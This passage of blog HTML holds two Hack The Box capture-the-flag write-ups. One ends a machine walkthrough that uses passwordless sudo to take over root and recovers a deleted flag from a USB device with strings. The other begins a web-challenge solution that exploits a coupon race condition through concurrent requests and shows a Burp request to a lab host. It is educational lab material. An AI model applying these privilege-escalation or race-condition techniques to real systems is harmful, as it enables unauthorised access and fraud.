url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHUlEQVR42nWQyXKCUBRE+ZYABQ8EAXkD86Ro1CIOMVnk/7+jc3lUpczCRVf33Zy63UbSnCB3V2TjFbw6ISlukO0DojgjTgcEcYco3SJMepiOxJsrYLqzS5hslqCcLtmTMBymwNUeBcEEuSoOqLsJWXkkSIuYb5GQNnJHd4c177WCTYtQe4dwzmkLJ8xhBFEDSSAuR6j8HSIbESUNfdVrQMwH+OsK602vMwtL2J6C5SvYfqaz7S+y5g9dtQU/3KCOnygPX+DdDxif4MUDQea65AR2VwUsqmmxRSb7n/8qF1RP1UeUwwVZdUbV35E3ExwvBwtKLcfPYdM01hPEegXk/QQxXiB2H5AE5803kvKOenggpd1WNIn+zJUvgc/QX22Wwl/ZXs64AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sudo -l" title="" src="/static/71cbab6e140336cd64e7ffb014df3c1e/50637/sudo-l.png" srcset="/static/71cbab6e140336cd64e7ffb014df3c1e/dda05/sudo-l.png 158w, /static/71cbab6e140336cd64e7ffb014df3c1e/679a3/sudo-l.png 315w, /static/71cbab6e140336cd64e7ffb014df3c1e/50637/sudo-l.png 630w, /static/71cbab6e140336cd64e7ffb014df3c1e/ad007/sudo-l.png 681w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">pi</code> user could run any command with <code class="language-text">sudo</code> without needing a password, so I used this to change the password of the <code class="language-text">root</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 399px; " > <a class="gatsby-resp-image-link" href="/static/8ff45e199a6a961636b9fbaf45a0ea80/ede3e/su-passwd-root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsUlEQVR42lWO6wqCQBQGe5Us7EaitbqWmXbRLTVDMoqw93+MaZUg+jEc+OAM05vHOXZRM9sXWKrCyW4sNVMnYRq8NQ1jeWdgKZa+wlsphJ/ib7LuCr1Zixhj5DEcS3rRoeKcPwnCnETdOWqyy4swKjjlD8qq0VuNOZH0hwLDdH9oyeBLK+uE3vrUPWyiC457ZLu7sktuSL2vo5J9WhPGJbY4IHSd2xbKtKubzIM/WSv8AGUMZVcFop3fAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="su passwd root" title="" src="/static/8ff45e199a6a961636b9fbaf45a0ea80/ede3e/su-passwd-root.png" srcset="/static/8ff45e199a6a961636b9fbaf45a0ea80/dda05/su-passwd-root.png 158w, /static/8ff45e199a6a961636b9fbaf45a0ea80/679a3/su-passwd-root.png 315w, /static/8ff45e199a6a961636b9fbaf45a0ea80/ede3e/su-passwd-root.png 399w" sizes="(max-width: 399px) 100vw, 399px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After switching to the <code class="language-text">root</code> user and changing directory into <code class="language-text">root</code>, the <code class="language-text">root.txt</code> file said that the original <code class="language-text">root.txt</code> has been lost, but there might be a backup on the USB:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/923fcbaae4255353a6e097b802e34908/5860e/root-txt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABEElEQVR42m2Q626CQBCFfRZoylUQYZfbwqogCKFYY5r0/V/kdGZtbJr448uZ/fPNnN3I6Y5q/UZ0WuDJAU52I1aE6YBUnhHGGm5Y480tiBy29wJXUErYfo6NPqyo6hmZ6JFkJ6TiCCE7kvXYG86I06ORGbwH/6XyT6hIqA4f0N0NspqMQJQjsmI0uaMlTlAR5UPoP7C9F3IWtqcruuGO5nhFXk8kGsxFQdwi3LXwI0WpjdR6p2quhOUIWJQ8285v8hJf8oULDv0nCjWjoOqJ6ExVTr6O/49lftTAI7kfNwhoEc/BrjFvd1s/q29ENULpxVA2M/rLF1W/kKgylzF8bZRoIwiTFlueScTJeLF61v4B4s7BH+043UIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root.txt" title="" src="/static/923fcbaae4255353a6e097b802e34908/50637/root-txt.png" srcset="/static/923fcbaae4255353a6e097b802e34908/dda05/root-txt.png 158w, /static/923fcbaae4255353a6e097b802e34908/679a3/root-txt.png 315w, /static/923fcbaae4255353a6e097b802e34908/50637/root-txt.png 630w, /static/923fcbaae4255353a6e097b802e34908/5860e/root-txt.png 676w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">lsblk</code> to list info on the block storage devices:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1c59e48c800b882ce0b5b2597f76b10e/8cfac/lsblk.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 23.417721518987342%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABC0lEQVR42j2Q6U7DMBCE+yjQCtImaezGzkHuq0laShBFCIn3f49h7Ah+jNYreb+Z3U3ZLBjmL0zXb2TVDUXzjrq/4xQP1IgwnaAox8/x8BTh0Ymp6F+7Q4Kdo1j53kfYBKcaOh0hdY8gbBDnF/YzmuGOtHhFSKjpNaFSD5CxUY8woWFyplGGraMJ0xa+USZJNECoFr6sLcQYlO2CJL/axHm1oBs/kXMbnc1QLxOinCoucI5M/qxXqEvgng5hfCa0hxtUqPoP6GQk6A2ag8YspKliGqE6uKKkCriyxEGscmVlews0N0y5Zko3s/Z8+4HHT56obGI3WN+C5/A5ePyrqkGgW9sL3cHj6czKv1fcpLDluNi1AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="lsblk" title="" src="/static/1c59e48c800b882ce0b5b2597f76b10e/50637/lsblk.png" srcset="/static/1c59e48c800b882ce0b5b2597f76b10e/dda05/lsblk.png 158w, /static/1c59e48c800b882ce0b5b2597f76b10e/679a3/lsblk.png 315w, /static/1c59e48c800b882ce0b5b2597f76b10e/50637/lsblk.png 630w, /static/1c59e48c800b882ce0b5b2597f76b10e/8cfac/lsblk.png 636w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Of the output, the most interesting was <code class="language-text">sdb</code> which was mounted at <code class="language-text">/media/usbstick</code>, so I went there to see what was on the USB:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 586px; " > <a class="gatsby-resp-image-link" href="/static/a9185814ebf2620cc60c90fd5f258f89/9cf6f/media-usbstick.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 26.58227848101266%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/0lEQVR42lVQ0XKCMBDkU1qxEkQQBGGIhIQEbUcLFaYz/f8v2V6CnbYPO3d7yW1249XtOy7XL5jXT3T9DNF9QJo7TnKE1HdwOm/kgCgReH4p4AflgrCCz0qsHvBZ5WaeFdTn2S3W4gZOy0pPKPkbDmWPtDBI8g57guVxJhHtBTZRjWDHfythbQV5e4NQA5puRKutswGchBs1Ql9m5872FqpfeC2uiA8SSUEPFRpZaZAetRP2dmlLLjowIsG2Bos4wrhBYGvS0PyELTkKY6oU295n1Psu5gLr7AdeXp3p7ybkVY/cRnxEy47GzeJMQZmJYrZ4WhdYBX9EWPVPzAp+A2MPpA15XuVZAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="media usbstick" title="" src="/static/a9185814ebf2620cc60c90fd5f258f89/9cf6f/media-usbstick.png" srcset="/static/a9185814ebf2620cc60c90fd5f258f89/dda05/media-usbstick.png 158w, /static/a9185814ebf2620cc60c90fd5f258f89/679a3/media-usbstick.png 315w, /static/a9185814ebf2620cc60c90fd5f258f89/9cf6f/media-usbstick.png 586w" sizes="(max-width: 586px) 100vw, 586px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">damnit.txt</code> mentioned that the files were deleted off the USB stick, and I also checked <code class="language-text">lost+found</code> but there wasn't anything there.</p> <p>However, even though the files were deleted off of the USB, the data isn't necessarily removed from the disk right away. Instead, it's marked as free space that can be overwritten by new data. The <code class="language-text">strings</code> utility can be used to search <code class="language-text">/dev/sdb</code> for ASCII strings and extract any contents that have yet to be overwritten on the disk, in this case, it revealed the root flag:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 584px; " > <a class="gatsby-resp-image-link" href="/static/d3b5ff2ae1b36fbf15e3f699e9836cf1/0fa65/root-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.72151898734178%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB90lEQVR42pWT647aMBCF8ySF3IHNlThXIJCEAKnYqlWL+qPv/xynxybLRl2pYn8cObbjzzNnPFrdf0e6vSDfDUiqE9blSc0TjmJzVvMw6yCqMyI5ci/IWhjLDOYqh/nyLovSivqrOihhq3iHuSugL1Kl6fe77msKNtUI1WSEVfOqYHLDeploVXw4KNc/wCbSqsMVy3DLH0venP3352fElAcE4oB10cFbM0oFfQMXoz4B3DDCbXNFKPZwJMhNYLjrUQnMZfpJIP2LRAt7mWNuE0LTjTeoE8OwQ6VnwVoto0tqiLyDz8IYDqNyR6hDqB1Bt/x7tE+kz5Rf+ebO9O/AquY8KO4gGZ3SmDojfvgqK72cev0PUJRHOExpbobQmbbuEMri6C4vWBS8qBqjDR6XmAvpr1Bg61FAAsvdBV60xSrcwfU4BjVW0R6uz++o5toGMzPGzPAwsyLMCVSir3MroB2UzGrsHK0fbtg1P9D0v9Ceb2hON7SXG7rhN4Zvf1Axg6xokfHiYn9lW8oWPcPnU4vyFlG6RxhXiFkD2yuhNf1PJDl7OOvhrxtu9PSzQZge2bu9egFp2cJPOwKO3D9ioRqhUADbq2DJ9N1YearlG97IgzEBQdJRLWLOQ8Gq8zuXEWV7fJHeuhn7O6WvkyfEVA36J5+b9PQvTU611FWphzwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root flag" title="" src="/static/d3b5ff2ae1b36fbf15e3f699e9836cf1/0fa65/root-flag.png" srcset="/static/d3b5ff2ae1b36fbf15e3f699e9836cf1/dda05/root-flag.png 158w, /static/d3b5ff2ae1b36fbf15e3f699e9836cf1/679a3/root-flag.png 315w, /static/d3b5ff2ae1b36fbf15e3f699e9836cf1/0fa65/root-flag.png 584w" sizes="(max-width: 584px) 100vw, 584px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-diogenes-rage/https://mgarrity.com/hack-the-box-diogenes-rage/Mon, 27 Mar 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/00d68369dec753ac97be12fb5f76ae05/3b67f/diogenes-rage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA1UlEQVR42p2SSQ6CQBBFOYKKLlQggpHRITI1gzNojBGN4/1v8u0m0YVGDSzeotLdL7+6iquLFr5Ra+sf/LrP4H4dNpUxWl37BatLCWttA5LmI0xuGAZb2PEeo3AHsjhDNiNUWzoaUr+AkD6QrQhkecGAbGA6KSw3hTM9QB3NUWlqxYS8YEBUPUTpncoSBKsrfJrOzxOGJRKylnUCb36CPcngUAKalokVKy4nZAnd2REubbPvrek/Zrm8YwTFhU+EngtR8+iASD4kVvOCWX5tWNJ3/q3NA3q1/04or9lDAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="diogenes&#39; rage" title="" src="/static/00d68369dec753ac97be12fb5f76ae05/50637/diogenes-rage.png" srcset="/static/00d68369dec753ac97be12fb5f76ae05/dda05/diogenes-rage.png 158w, /static/00d68369dec753ac97be12fb5f76ae05/679a3/diogenes-rage.png 315w, /static/00d68369dec753ac97be12fb5f76ae05/50637/diogenes-rage.png 630w, /static/00d68369dec753ac97be12fb5f76ae05/fddb0/diogenes-rage.png 945w, /static/00d68369dec753ac97be12fb5f76ae05/3b67f/diogenes-rage.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Diogenes' Rage is a web challenge featuring a vending machine application that enables users to purchase items using a coupon worth $1.00 that can be applied only once. Upon viewing the code, it becomes clear that the goal of the challenge is to purchase the <code class="language-text">C8</code> item to obtain the flag. However, the price of the <code class="language-text">C8</code> item is $13.37 and the vending machine only allows a user to purchase an item worth up to $1.00 (with the coupon).</p> <p>Further analysis of the code shows that it's vulnerable to a race condition. This vulnerability can be exploited to send many concurrent requests to the server to apply the coupon, which adds to the user's balance. This balance can then be used to purchase the <code class="language-text">C8</code> item and reveal the flag.</p> <p>Starting the docker instance and visiting the web page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e5b5e27a70f1ab5b8a37cad53b3da912/51bf4/game.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.69620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC+UlEQVR42jWRfU9bdRTH+wJcnGzBQVuglWp56AKLwZnNTadpotmMyeJkGgZd6e3tbXtvoU+0TISNRaBlrZVmA7aOVSYLY+hkbnQRdZoQZzT7Q43xBZj4Lj6ei/GPk5zzO+f3yfmer8Vub8dmdbFvnxOrrY3d9U6eqmtiT4NrJ9+1t5l6m3unrqt3yKwbq0S99KzWF7DJHzNvbHxecjeWlpb9NMrw3meddD/XjdF5jHDbEdI9Jxjq8uJ39hBofwXVfYiXGtw02NsE1MYzexw7MHOh/+FNTR0msBOXqxt7i4ejHT38/t09/vpzmyfbm/zz928UfQHsuyy82PA0XrsHm9NDV0cX3sOHaW7uxCl1a2sXDocHhzAskXASZdBAi6QYVYbZmLzA/XKRr2ZzbF2ZYyUxQjk3ysJ0lgmfhi8wzMXx8yxdniUQHSGsDhNUhhiKZYkZGSwheVCVGIHgEKmBMD9Ur/PT5pds31vn580veFAssVLbYE0ib4zQN6ChT+YYm7/OaT1NKBBDlb9qcBgjmv4PqEnh8+sk+jW2lhd5sF5lfXmBx7Wb3M8XWfh8gxu3vianJujzRwlOzpAoz9Mby6DJMkFzoUGdiJbAYugjhAQY1OJkZPibfIFHlQrfX7vGo8VFNsanWJ2vcnfxM2a0JGGZD16YwiiU0JKZHYgSMNDlZKZsixaKExCQKo1RAf/4cIUnf3zLr48fsvVLjdrlK6zl57hbKJPXs5w8+QHed0/jOfQadbvrOPH2ewJLExWgocsNwwKMiXZFpCf7w6ypKe5Es9wOZViLjrLqT7CspLh1Nk5BSXDwVS8dLx+h/cBBWl2dnBWjomKsaYyp1uL3hTj+5nH65H5xAdbKFWpXl6mJzK2bt1l9P0rljV6Wjp1i4vVTvNM7wIGjXt46EyQirmpqnP4zIQbFg7B5w5npWVRV4ePpHJ9O5VlKj1HNTnAjM0713Hkq4uRVPUUlkqQkvdylEsnsh8TPjfHRxEXyuQIm45PiHJdmS/wLssXoW46V4tkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="game page" title="" src="/static/e5b5e27a70f1ab5b8a37cad53b3da912/50637/game.png" srcset="/static/e5b5e27a70f1ab5b8a37cad53b3da912/dda05/game.png 158w, /static/e5b5e27a70f1ab5b8a37cad53b3da912/679a3/game.png 315w, /static/e5b5e27a70f1ab5b8a37cad53b3da912/50637/game.png 630w, /static/e5b5e27a70f1ab5b8a37cad53b3da912/fddb0/game.png 945w, /static/e5b5e27a70f1ab5b8a37cad53b3da912/f46b1/game.png 1260w, /static/e5b5e27a70f1ab5b8a37cad53b3da912/51bf4/game.png 1292w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>When a new user is created, a <code class="language-text">balance</code> column will be added within the <code class="language-text">userData</code> table:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f99c7768746965f6c87a5874627fbd66/3376a/database.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB90lEQVR42o1TW47bMBDbe0Sy9ZYtP+RHmha76FcP0fufhOUoKYpik6If9MiWxCFnxm/DEHGeJ+ZpQk6JyEhEjBE5D4hct+9c5zRiyCNSlv30FG9ysZCsLBV5WjGuO5Z5xraP2LcF61RwzAnbOrVkOZWWrNMduu4z3uRhrEXvMwyz91TifY8QLKzR8KaHswaOse81lNbQxDOyRmjkgnOwcUCoB+L1hrIdGJYNeZhgrUfHM68InhCaRtgxq3URaXvHfH7DfH1HuX6g7F/hvG/7/01oadn0BsYwUo01HXQn6KHVBeqi7jY1o7rjJaGQOccaCnGeMdUN21GxpBnJJ4Sh0HqGZwdbWXKBT8NrwlY/aQrVGFFkpGYWwTg2w8PJGOUIFwJsiCTLXMfXhJ71cUJIEpcmjsyEWmeOhnTbs7MdLrSoaFeJXa3+3WXPzHJRXpwL2MqC60bbdce5V6wzhzl4jClgIuScehDq39B3PBS61mVRIg2SWPn3jNEhc2+MHuuYsND2MghS+9b3bB7heMdzTi3jH8syNnyRWnY8NAaHkxcLCWeSfOwLbkvBlWoFt5XrZWxJRHUdM0oMTe1fhFJLxXhQ5c9a8MNb1JLx/VjwRYhIMpMkcCoik4kqpT9Z9ndlD4Uyh2JBaia/XBLbXEsUZNbT0IV60Zhfv7SKlyLIQcMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="database.js" title="" src="/static/f99c7768746965f6c87a5874627fbd66/50637/database.png" srcset="/static/f99c7768746965f6c87a5874627fbd66/dda05/database.png 158w, /static/f99c7768746965f6c87a5874627fbd66/679a3/database.png 315w, /static/f99c7768746965f6c87a5874627fbd66/50637/database.png 630w, /static/f99c7768746965f6c87a5874627fbd66/3376a/database.png 694w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The code for the <code class="language-text">/api/purchase</code> route shows how to find the flag:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/40b46511dcdca3d38700e429f7148bd9/c57e6/api-purchase-route.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 53.79746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABsUlEQVR42n1TW27jMBDLORpb74dtyZYVZzcJsH97/zNxKSVbFC3aD0ISrOGQ1PikfURKBddjx6VWrKViqb+Q6g3aWChtYX2A5ipGQYwQQnyLk9YKSkqEMCFvB/LlinWviEuCmxb4OcG4AKkkyTVXDcH7PxDqvjHGsXgjSUKiymkt74QuziR1sM53ciHkCz8R0tKy7Cj1QsICGyIGoTC+vWE8nyHFCEWIceAqeJbQVKqpXH5Q/E7YoKTATIXHn79YaL3ZL9cbMvOc1w1L2TDlDTEGLHNE8HRlDRRjGD8Tti4d7LzmgsdRca8ZB/O87AfKkokN+1qRvMdEZa45Ow9wA/F6rC+ELXAjBuzWU90DB1Xd64ZjcrjPM36vEY/bgRQjFqOQjOaqkf8rtNZ2IqVUR9sbNknWoUSH1VtknrN5YiXJ5jVKylhDQKHlrUP30ToZ88pQPlU67frcueA5SgGBeYWZZ2d7Xh3OQGqDkfc7WD9K0V/+abmpYrDaGI7PE7aBxZbfLZtazmvf97lVLB5f+DQ2rVC1gPlXWObm2su5Bkt1Do6kjoSelkJT1+5L/e1g/wNTYTd6UYVGVQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="/api/purchase" title="" src="/static/40b46511dcdca3d38700e429f7148bd9/50637/api-purchase-route.png" srcset="/static/40b46511dcdca3d38700e429f7148bd9/dda05/api-purchase-route.png 158w, /static/40b46511dcdca3d38700e429f7148bd9/679a3/api-purchase-route.png 315w, /static/40b46511dcdca3d38700e429f7148bd9/50637/api-purchase-route.png 630w, /static/40b46511dcdca3d38700e429f7148bd9/fddb0/api-purchase-route.png 945w, /static/40b46511dcdca3d38700e429f7148bd9/c57e6/api-purchase-route.png 1075w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">/api/coupons/apply</code> endpoint can potentially create a race condition because the code is making asynchronous database calls to read, modify, and update user data without any locking mechanisms. This creates an opportunity for multiple concurrent requests to be made which could result in multiple additions to the user's balance using the same coupon code before the database has a chance to register the initial coupon request and invalidate it.</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1a231e836a6028ea53427bd9a4e37394/b3373/api-coupons-apply-route.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnUlEQVR42n1SW47jIBDMQcbm0YAN2AY7Mxpp73+v2mo80X6sMh8lcNIU9eDhYsZxdDyvjvM80fqJXA/k8xthLbA+wEuExAXOephpxjy/x8Maw0GLNW84+he26xPH84m1bJAlI9UdPq0wZoblnHWOB80vhBwy3PiQEEpDbE8sZceyn1iPC4GkSiwhDHgqnSli4pnpLSEHhNbSRmXtm2ortpqQSkbIJBOBUyfDjYF3FkLo/g3hTJUGdVHbHf060HtF2hsyMw2qjgTBO64OkWsSD8ff3iocKjlUWMj19Qf7XhFTgBMiRFhd5V4/pmlgmv7ZfkUwSrkJ79D1z0CCrW34vHasLKW0E+VozPRkDI3NyyjnZV9L9YRG8nip0+YG4SDmoDjsNSOXgka1fS/o24qaCxY+pyUlrMEjBRlRaAxK/tDDN+HMTHgrb1/XSOsLvO5pu+aAhTmGH1VCBB72/B5Wh/07gqHQGrZmBTHy6aSIRMTI1onoPaIWQcWiKkbm9s6PJP+VoreoVXFCRVShFuSGlqJFvSwlXfltrXv7sP8CaoE2DUB9QzYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="/api/coupons/apply" title="" src="/static/1a231e836a6028ea53427bd9a4e37394/50637/api-coupons-apply-route.png" srcset="/static/1a231e836a6028ea53427bd9a4e37394/dda05/api-coupons-apply-route.png 158w, /static/1a231e836a6028ea53427bd9a4e37394/679a3/api-coupons-apply-route.png 315w, /static/1a231e836a6028ea53427bd9a4e37394/50637/api-coupons-apply-route.png 630w, /static/1a231e836a6028ea53427bd9a4e37394/fddb0/api-coupons-apply-route.png 945w, /static/1a231e836a6028ea53427bd9a4e37394/b3373/api-coupons-apply-route.png 1070w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>When a request is made to redeem a coupon, it is then sent to the database to update the user's balance using the <code class="language-text">addBalance</code> method from the <code class="language-text">Database</code> class:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c95ba05a71c55023282584cb61909d8d/6f2d0/addBalance.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 19.62025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlklEQVR42o2PQRbCIAxEexKGBCy1gEDvf7cx1LrQjS7+m+QlbyZZRIQaE4/WWUdnNE11sPbOvO9c18CgIJyjBz7AV+9sZxFVGzgKlLmYSa3MqXDLle04+BiDpRSWfeMtKFcjBjlVxZ+aYmBUIbw3Q5kFKNa0UpnS3ZJe6YCnu8B1wS+WEKIlCf00tktxvTJN5wLeAH/xBGy1b/LYSaq0AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="addBalance" title="" src="/static/c95ba05a71c55023282584cb61909d8d/50637/addBalance.png" srcset="/static/c95ba05a71c55023282584cb61909d8d/dda05/addBalance.png 158w, /static/c95ba05a71c55023282584cb61909d8d/679a3/addBalance.png 315w, /static/c95ba05a71c55023282584cb61909d8d/50637/addBalance.png 630w, /static/c95ba05a71c55023282584cb61909d8d/fddb0/addBalance.png 945w, /static/c95ba05a71c55023282584cb61909d8d/6f2d0/addBalance.png 1021w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>If multiple concurrent requests to <code class="language-text">/api/coupons/apply</code> happen at the same time to redeem the <code class="language-text">HTB_100</code> coupon, then many of those requests could potentially execute the <code class="language-text">addBalance</code> method.</p> <p>So, I made an initial request in Burp Suite to obtain a session cookie by sending the following request:</p> <div class="gatsby-highlight" data-language="http"><pre class="language-http"><code class="language-http"><span class="token request-line"><span class="token method property">POST</span> <span class="token request-target url">/api/purchase</span> <span class="token http-version property">HTTP/1.1</span></span> <span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">144.126.236.158:30114</span></span> <span class="token header"><span class="token header-name keyword">User-Agent</span><span class="token punctuation">:</span> <span class="token header-value">Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0</span></span> <span class="token header"><span class="token header-name keyword">Accept</span><span class="token punctuation">:</span> <span class="token header-value">*/*</span></span> <span class="token header"><span class="token header-name keyword">Accept-Language</span><span class="token punctuation">:</span> <span class="token header-value">en-US,en;q=0.5</span></span> <span class="token header"><span class="token header-name keyword">Accept-Encoding</span><span class="token punctuation">:</span> <span class="token header-value">gzip, deflate</span></span> <span class="token header"><span class="token header-name keyword">Referer</span><span class="token punctuation">:</span> <span class="token header-value">http://144.126.236.158:30114/</span></span> <span class="token header"><span class="token header-name keyword">Content-Type</span><span class="token punctuation">:</span> <span class="token header-value">application/json</span></span> <span class="token header"><span class="token header-name keyword">Origin</span><span class="token punctuation">:</span> <span class="token header-value">http://144.126.236.158:30114</span></span> <span class="token header"><span class="token header-name keyword">Content-Length</span><span class="token punctuation">:</span> <span class="token header-value">13</span></span> <span class="token header"><span class="token header-name keyword">Connection</span><span class="token punctuation">:</span> <span class="token header-value">close</span></span> <span class="token application-json"> <span class="token punctuation">{</span> <span class="token property">"item"</span><span class="token operator">:</span><span class="token string">"C8"</span> <span class="token 